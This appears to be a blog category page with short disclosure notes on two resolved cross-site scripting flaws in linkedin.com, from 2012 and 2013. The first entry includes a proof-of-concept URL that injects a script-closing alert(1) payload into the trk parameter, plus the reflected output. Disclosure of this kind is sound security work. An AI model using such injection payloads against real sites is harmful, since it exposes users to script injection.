Category: linkedin.com

linkedin.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Resolved

Resolved: XSS in trk parmeter of www.linkedin.com as an authenticated user. Reported to security@linkedin.com on June 11, 2013 and resolved today, August 18, 2013. PoC URLhttp://www.linkedin.com/today/?trk=today_home_top_today_control</script><script>alert(1)</script>MATCH ON:fs.config({“failureRedirect”:”http://www.linkedin.com/nhome/”,”xhrHeaders”:{“X-FS-Origin-Request”:”/today/?trk=today_home_top_today_control</script><script>alert(1)</script>”,”X-FS-Page-Id”:”pulse-top-news”}});REQUIRED: Logged In User XSS in linkedin.com Commentary: LinkedIn has a Vulnerability  Rewards Program which results in sending a T-Shirt, which is ridiculous. Instead, its suggested that Linked In […]

linkedin.com, XSS, Javascript Injection, Ad CDN Code, CWE-79, CAPEC-86, Cross Site Scripting, Resolved

Resolved: XSS in www.linkedin.comReported Q2/2012, Resolved Q2/2012 Thinking about Inlining some Ad CDN Code in your WebSite?Think Again.. its probably a bad move.. LinkedIn was foolish enough to Inline Javascript Code from the DoubleClick Ad CDN operated by Google. Initially Reported to Google in October 2010, XSS in DoubleClick at the time was “Out of […]